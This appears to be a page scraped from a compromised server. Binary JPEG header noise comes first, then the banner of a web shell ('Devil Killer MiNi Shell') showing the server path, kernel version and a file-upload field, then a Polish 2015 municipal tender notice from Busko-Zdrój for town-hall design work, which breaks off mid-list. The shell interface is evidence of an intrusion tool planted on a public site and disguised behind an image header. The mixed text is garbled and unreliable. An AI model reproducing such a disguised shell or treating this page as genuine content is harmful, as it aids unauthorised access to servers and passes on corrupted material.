JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150529/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150529/78465-N-2015.html

<p class="kh_header"><b>Busko-Zdrój: Opracowanie dokumentacji technicznej dla zadania pn. *Rozbudowa budynku UMiG w celu poprawy jakości świadczonych usług publicznych*</b><br>
<b>Numer ogłoszenia: 78465 - 2015; data zamieszczenia: 29.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta i Gminy , ul. Adama Mickiewicza 10, 28-100 Busko-Zdrój, woj. świętokrzyskie, tel. 041 3705200, faks 041 3705290.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umig.busko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej dla zadania pn. *Rozbudowa budynku UMiG w celu poprawy jakości świadczonych usług publicznych*.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
1.1. Usługa polegająca na opracowaniu dokumentacji technicznej, architektoniczno - budowlano - wykonawczej pn: 
 *Rozbudowa budynku Urzędu Miasta i Gminy w Busku-Zdroju 
w celu poprawy jakości świadczonych usług publicznych* 
w ramach projektu *Rozwój społeczno-gospodarczy, fizyczny i przestrzenny Miasta Busko-Zdrój poprzez działania rewitalizacyjne*
Obiekt siedziby Urzędu Miasta i Gminy w Busku-Zdroju zlokalizowany jest przy ul. A. Mickiewicza 10 w Busku-Zdroju. - działka nr ewid. gruntu 199/2, obręb 10.  Pochodzi z lat czterdziestych ubiegłego wieku. 
Zamawiający nie posiada dokumentacji technicznej dotyczącej zarówno budowy budynku głównego,  jak i dobudowanego skrzydła.
Przedmiot zamówienia obejmuje wykonanie prac projektowych w zakresie:
a. rozbudowy, nadbudowy i przebudowy w.w. budynku w oparciu o załączoną koncepcję architektoniczną
b. podniesienia poziomu standardu istniejącej części budynku do współcześnie obowiązujących norm i przepisów  dot. budynków użyteczności publicznej - remont istniejącej części (budowlanej i instalacyjnej) zgodnie z wymaganiami użytkownika
c. przebudowy istniejącej elewacji wraz z ociepleniem (termomodernizacja) oraz pracami towarzyszącymi (wymiana okien, drzwi, obróbek blacharskich, rur, rynien itp.)
d. wykonania windy (z poziomu piwnic do ostatniej kondygnacji)
e. wykonania instalacji wewnętrznych: wod-kan, c.o., wentylacji i klimatyzacji, elektrycznej, oświetleniowej,  komputerowej (z możliwością podłączenia wizyjnego), alarmowej, przeciwpożarowej  itp. 
f. wykonania instalacji odgromowej, uziemieniającej i wyrównawczej oraz awaryjnego zasilania budynku  w przypadku zaniku napięcia zasilającego
g. umieszczenie na dachu budynku aparatury i urządzeń niezbędnych do prawidłowego funkcjonowania obiektu
h. zmiany źródła ciepła
i. zastosowania odnawialnych źródeł energii
j. zagospodarowania terenu uwzględniającego:
- podjazd dla osób niepełnosprawnych,
- parking na samochody osobowe,
- zagospodarowanie terenu w zieleń i małą architekturę
1.2. Opracowanie mapy do celów projektowych na potrzeby niniejszego zadania 
1.3. Opracowanie inwentaryzacji technicznej (budowlanej i instalacyjnej) stanu  istniejącego budynku.
1.4. Opracowanie ekspertyzy stanu technicznego wraz ze stanem instalacji wewnętrznych, opinii technicznej dotyczącej możliwości nadbudowy, rozbudowy i przebudowy, opinii geotechnicznej.
1.5. Opracowanie przedmiaru robót i kosztorysu inwestorskiego - dla  w/w zadania,
1.6. Opracowanie specyfikacji technicznej ogólnej wykonania i odbioru robót - dla w/w zadania.
1.7. Opracowanie  informacji dotyczącej bezpieczeństwa i ochrony zdrowia
1.8. Opracowanie charakterystyki energetycznej budynku
1.9. Opracowanie instrukcji bezpieczeństwa przeciwpożarowego budynku.
1.10. Sprawowanie nadzoru autorskiego na etapie projektu oraz wykonywania robót.
2. Zakres prac projektowych
1. W zakresie prac projektowych należy wykonać:
a. opracowania wymienione w pkt 4.2.2 - 4.2.9.
b. koncepcję rozbudowy, nadbudowy i przebudowy budynku w oparciu o załączoną koncepcję architektoniczną (załącznik nr 8 do SIWZ),  uwzględniającą rozmieszczenie pomieszczeń na każdej z kondygnacji wraz z propozycją materiałową,
c. projekt architektoniczno - budowlano-wykonawczy dla w.w. zadania.
W ramach prac projektowych należy wykonać  również  projekt wizualizacji zewnętrznej oraz wewnętrznej obiektu.
Projekty budowlano-wykonawcze należy opracować w 7 egzemplarzach w wersji papierowej + wersja elektroniczna dokumentacji do zamieszczenia na stronie internetowej UMiG Busko-Zdrój, w formie cyfrowej na nośnikach elektronicznych (rysunki w formacie DWG i w formacie PDF, teksy w doc. i w formacie PDF.  
d. uzyskanie wszystkich uzgodnień, opinii, pozwoleń, uzgodnień branżowych itp. wymaganych przepisami szczególnymi  (w tym pozytywnej opinii ŚWKZ) niezbędnych do opracowania, a następnie - zatwierdzenia   dokumentacji oraz wydania pozwolenia na budowę przez Starostwo Powiatowe w Busku- Zdroju.
Obowiązek ten projektant realizuje poprzez opracowanie wniosków wraz z niezbędnymi załącznikami i dokumentami oraz złożenie ich do właściwych organów na podstawie udzielonego przez Burmistrza Pełnomocnictwa. W kosztach opracowania projektu należy zatem uwzględnić ewentualne koszty uzyskania uzgodnień, opinii i pozwoleń.
Uzyskanie  pozwolenia na budowę jest po stronie Wykonawcy.
e. uzyskanie akceptacji ŚWKZ dla zaprojektowanych materiałów wykończeniowych (w zakresie elewacji i zewnętrznych prac wykończeniowych) 
f. przygotowanie kompletnych materiałów niezbędnych do uzyskania przez projektanta odrębnych decyzji np.  o Środowiskowych Uwarunkowaniach (jeśli wymagane), wraz z wyrysami i  wypisami z ewidencji gruntów oraz kartą informacyjną przedsięwzięcia.
g. przygotowanie kompletnych wniosków (wraz z załącznikami) niezbędnych do uzyskania przez Zamawiającego decyzji o lokalizacji inwestycji celu publicznego/decyzji o warunkach zabudowy oraz decyzji o pozwoleniu na budowę.
h. opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych, z uwzględnieniem materiałów zaakceptowanych przez ŚWKZ (w 2 egzemplarzach + wersja elektroniczna - doc, PDF).
i. opracowanie przedmiaru robót wraz z zestawieniem materiałów - (w 2 egzemplarzach w wersji papierowej + wersja elektroniczna  na nośnikach elektronicznych - w formacie PDF, ATH, KST w programie NORMA lub z rozszerzeniem odczytywalnym przez program NORMA lub arkusz kalkulacyjny Excel).
Przedmiar robót należy wykonać zgodnie z obowiązującymi przepisami - Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia  metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 z 2004 r. poz. 1389 z późn. zmianami). 
Przedmiar robót powinien zawierać zestawienie przewidywanych do wykonania robót podstawowych w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem, wskazaniem podstaw ustalających szczegółowy opis oraz wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych, z wyliczeniem i zestawieniem ilości jednostek przedmiarowych robót podstawowych. 
j. opracowanie kosztorysu inwestorskiego w wersji uproszczonej  (w 2 egzemplarzach  w wersji papierowej + wersja elektroniczna  na nośnikach elektronicznych - w formacie PDF, ATH, KST w programie NORMA lub z rozszerzeniem odczytywalnym przez program NORMA lub arkusz kalkulacyjny Excel).
Kosztorys inwestorski zostanie wykonany zgodnie z obowiązującymi przepisami - Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130 z 2004 r. poz. 1389 z późn. zmianami). 
k. uzgodnienia branżowe oraz wszystkie inne czynności niezbędne do prawidłowego wykonania przedmiotu zamówienia. 
Wszystkie dokumenty, które będą występowały w oryginale należy umieścić w
egzemplarzu nr 1.
UWAGA! 
Zamawiający załączył do SIWZ *Opinię techniczną-ekspertyzę o możliwości nadbudowy 1 kondygnacji na części budynku Urzędu MiG w Busku-Zdroju* z maja 1987r. - załącznik nr 7.
2. Dokumentację techniczną należy opracować w oparciu o: koncepcję architektoniczną przedstawioną przez Zamawiającego, rozwiązanie opracowane przez Wykonawcę/Projektanta i zaakceptowane przez Zamawiającego,  uzgodnienia z Zamawiającym oraz akceptację Świętokrzyskiego Wojewódzkiego Konserwatora Zabytków.
3. Zamawiający zlecił opracowanie audytu energetycznego istniejącego stanu budynku.
Wykonawca zobowiązuje się uwzględnić w opracowywanej dokumentacji technicznej zalecenia zawarte w audycie energetycznym.
4. Podczas opracowywania dokumentacji projektowej należy przyjąć założenie 
wykonywania prac przy funkcjonującym obiekcie. W dokumentacji należy ująć 
etapowanie prac umożliwiające prowadzenie robót budowlanych w jak najmniej 
uciążliwy dla interesantów i pracowników urzędu sposób.
5. Projekty budowlane muszą zawierać optymalne rozwiązania funcjonalno-użytkowe, konstrukcyjne, materiałowe i finansowe. Projekt wykonawczy musi zawierać rysunki szczegółów i detali wraz z opisem -  niezbędne do wykonania robót budowlanych.
6. Dokumentację należy opracować w języku polskim, zgodnie z obowiązującymi normami, przepisami, warunkami technicznymi, ze sztuką budowlaną i należytą starannością.
7. Dokumentacja projektowa winna być sporządzona przez osoby posiadające odpowiednie do zakresu prac uprawnienia oraz w przypadku konieczności - sprawdzona przez osoby sprawdzające.
8. W cenie wykonania dokumentacji należy uwzględnić koszty związane z zakresem prac projektowych, w tym w szczególności z:
a) opracowaniem  ekspertyzy stanu technicznego wraz ze stanem instalacji wewnętrznych oraz opinią techniczną dotyczącą możliwości nadbudowy, rozbudowy i przebudowy
b) opracowaniem opinii geotechnicznej określającej warunki gruntowe
c) opracowaniem inwentaryzacji technicznej (budowlanej i instalacyjnej) stanu  istniejącego budynku
d) uzyskaniem mapy do celów projektowych
e) uzyskaniem wszystkich uzgodnień, opinii i pozwoleń niezbędnych do zatwierdzenia dokumentacji oraz uzyskania pozwolenia na budowę
f) sporządzeniem aktualizacji kosztorysów inwestorskich.
Aktualizacja kosztorysów może nastąpić w przypadku ogłoszenia przetargu w terminie przekraczającym 6 m-cy od daty opracowania kosztorysów.  
g) nadzorem autorskim w czasie realizacji inwestycji w ilości max. 7 wizyt na budowie projektanta każdej branży na pisemne wezwanie Inwestora (nie wynikające z wad projektu).
9. Wykonawca projektu sprawować będzie nadzór autorski (bez dodatkowego wynagrodzenia) w zakresie obejmującym w szczególności:
- pisemne udzielanie wyjaśnień i odpowiedzi na pytania oferentów na etapie ogłoszenia przetargu na wykonawstwo w terminie do 3 dni od ich przekazania przez Zamawiającego
- pisemne wyjaśnienia Inwestorowi i Wykonawcy wątpliwości dotyczących projektu budowlano- wykonawczego i zawartych w nim rozwiązań w terminie do 3 dni od ich przekazania przez Zamawiającego
- ewentualne uzupełnienie szczegółów dokumentacji projektowej budowlano-wykonawczej,
- sprawdzanie zgodność realizacji robót (w tym dotyczących materiałów) z zakresem dokumentacji projektowej
- konsultowanie i uzgadnianie z Zamawiającym i wykonawcą robót możliwości  
wprowadzenia rozwiązań zamiennych w stosunku do materiałów przewidzianych w dokumentacji projektowej 
10. Wszelkie prace projektowe lub czynności nie opisane wyżej, a wynikające z procedur określonych w przepisach szczególnych, niezbędne do właściwego i kompleksowego opracowania dokumentacji projektowej, należy traktować jako oczywiste i uwzględnić  w kosztach i terminach wykonania przedmiotu zamówienia.
11. Wszystkie dokumenty w formie elektronicznej należy przekazać:
- w wersji źródłowej w programie, w którym zostały utworzone,
- w programie umożliwiającym wydruki w formacie PDF
- przedmiar robót i kosztorys inwestorski - w formacie PDF, ATH, KST w programie NORMA lub z rozszerzeniem odczytywalnym przez program NORMA lub arkusz kalkulacyjny Excel)
Projektant zobowiązuje się do aktualizacji kosztorysu (na pisemne wezwanie Zamawiającego) co 6 miesięcy do czasu wyłonienia Wykonawcy robót,
- na nośnikach (płyta CD, CD-R). 
12. Projektant ponosi pełną odpowiedzialność za wady i błędy projektowe ujawnione w okresie procedur administracyjnych, jak również ujawnione w toku wdrażania do realizacji przedmiotu umowy.
Projektant odpowiada również za wady i błędy w przedmiarze robót i kosztorysie inwestorskim, ujawnione podczas trwania procedury przetargowej na roboty budowlane, a w przypadku ich stwierdzenia, zobowiązuje się w wyznaczonym przez Zamawiającego terminie do wprowadzenia odpowiednich poprawek lub uzupełnień, bez dodatkowego wynagrodzenia.
Projektant zobowiązuje się w wyznaczonym przez Zamawiającego terminie do udzielania wyczerpujących wyjaśnień na zadawane pytania przez Oferentów w trakcie trwania  procedury przetargowej na roboty budowlane, bez dodatkowego wynagrodzenia.
13. Do obowiązków Wykonawcy należy zaopatrzenie dzieła w pisemne oświadczenie, że dostarczona dokumentacja jest wykonana zgodnie z umową, obowiązującymi przepisami techniczno-budowlanymi i normami oraz, że jest kompletna z punktu widzenia celu, któremu ma służyć.
Przedmiot zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych do prawidłowego zrealizowania przedmiotowego zamówienia w zakresie rzeczowym ujętym w niniejszej specyfikacji istotnych warunków zamówienia (SIWZ) oraz wzorze umowy.
3. Wymagania formalne i prawne dotyczące dokumentacji projektowo-kosztorysowej:
Dokumentacja budowlano-wykonawcza musi być opracowana w sposób zgodny z:
a. Ustawą z dnia 7 lipca 1994 roku Prawo Budowlane (tj.  Dz.U.2013.1409 z późn. zmianami); 
b. Ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz.U. z 2013 r., poz. 907 ze zm.) Rozporządzeniem Ministra Infrastruktury z dnia 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. Nr 202, poz.2072z 2004 r.)
c. Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz.U. z 2004 r. nr 130, poz. 1389  ze zm.) 
d. Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003r. w sprawie szczegółowego zakresu i formy projektu budowlanego  (tj. Dz. U. z dnia 10 lipca 2003r.)
e. Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002r. Nr 75 poz. 690 z póź. zm.)
f. Wytycznymi zawartymi w innych tematycznych przepisach szczegółowych i Polskich Normach oraz zgodnie z zasadami wiedzy techniczno-budowlanej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium w niniejszym postępowaniu</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 głównej usługi projektowej polegającej na wykonaniu kompleksowego projektu architektoniczno-budowlano-wykonawczego na budowę, rozbudowę, przebudowę, nadbudowę lub modernizację  obiektu kubaturowego 
o charakterze użyteczności publicznej znajdującego się w strefie ochrony konserwatorskiej, o powierzchni całkowitej  min. 1 500 m2 (branża budowlana i instalacyjna)
wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje minimalnych wymagań do powyższego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony formularz ofertowy z wykorzystaniem wzoru wg Załącznika 1;
2. Pisemne zobowiązanie innych podmiotów, o których mowa w art. 26 ust. 2b Pzp, do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia, w przypadku, gdy Wykonawca będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych tych podmiotów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 86</li>
<li>2 - Doświadczenie - 14</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące okoliczności i warunki zmiany postanowień zawartej umowy.
1. Zmiana postanowień umowy wymaga formy pisemnej pod rygorem nieważności.
2. Zmiana postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadku: 
a) wystąpienia ograniczenia zakresu przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, na skutek okoliczności, których nie można było przewidzieć na etapie przygotowania inwestycji do realizacji,
b) wystąpienia nieistotnych zmian tj. zmian, które nie mają wpływu na tzw. konieczne warunki Umowy  (termin, zakres, wartość Umowy).
3. Zmiana terminu wykonania przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, może nastąpić w przypadkach gdy: 
a) opóźnienie terminu wykonania przedmiotu Umowy nie jest zależne od Wykonawcy t.j. wydłużeniu ulegnie termin uzyskania wszelkich opinii, uzgodnień oraz decyzji administracyjnych. Termin ten zostaje wówczas  przedłużony o czas otrzymania w/w dokumentów;
b) wystąpi konieczność uzyskania od organów administracji państwowej dodatkowych decyzji, uzgodnień, pozwoleń itp. niezbędnych do wykonania przedmiotu zamówienia
4. Zmiana zakresu rzeczowego umowy w stosunku do treści oferty, na podstawie dokonano wyboru Wykonawcy, może nastąpić w przypadku wystąpienia okoliczności, których nie można było  przewidzieć na etapie przygotowania inwestycji do projektowania.
5. Zmiana wartości przedmiotu umowy w stosunku do treści oferty, na podstawie której dokonano  wyboru Wykonawcy, może nastąpić w przypadkach
a) zmniejszenia zakresu rzeczowego Umowy,
